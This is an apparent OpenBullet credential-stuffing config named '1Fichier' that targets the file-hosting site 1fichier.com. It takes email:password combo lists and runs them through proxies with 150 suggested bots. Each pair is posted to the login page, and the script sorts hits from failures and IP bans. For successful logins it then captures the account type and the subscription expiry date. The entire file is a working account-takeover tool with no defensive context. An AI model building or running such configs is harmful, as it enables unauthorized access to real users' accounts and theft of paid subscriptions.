[SETTINGS]
{
  "Name": "1Fichier",
  "SuggestedBots": 150,
  "LastModified": "2018-12-08T13:12:13.3529521+00:00",
  "AdditionalInfo": "",
  "Author": "MaStErChO",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#Login REQUEST POST "https://1fichier.com/login.pl" AutoRedirect=TRUE 
  CONTENT "mail=<USER>&pass=<PASS>&lt=on&purge=on&valider=Send" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://1fichier.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "Your subscription will end the" 
    KEY "Logout" 
  KEYCHAIN Failure OR 
    KEY "Invalid username or Password" 
    KEY "Email was not confirmed." 
    KEY "Invalid email address" 
    KEY "Invalid password" 
    KEY "Invalid username" 
  KEYCHAIN Ban OR 
    KEY "For security reasons, following many identification errors, your IP address" 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "" 
#Capture REQUEST GET "https://1fichier.com/console/index.pl" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://1fichier.com/login.pl" 
#CAPTURE PARSE "<SOURCE>" LR "<div class=\"alc\">" "<" Recursive=FALSE -> CAP "Type" "" "" 
#CAPTURE PARSE "<SOURCE>" LR "<div class=\"alc\">" "<" Recursive=FALSE -> VAR "T" "" "" 
#FREE KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "<T>" EqualTo "Free Account" 
REQUEST GET "https://1fichier.com/console/abo.pl" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#VAliD PARSE "<SOURCE>" LR "Your Access offer subscription is valid until <span style=\"font-weight:bold\">" "<" Recursive=FALSE -> CAP "Valid until" "" "" 
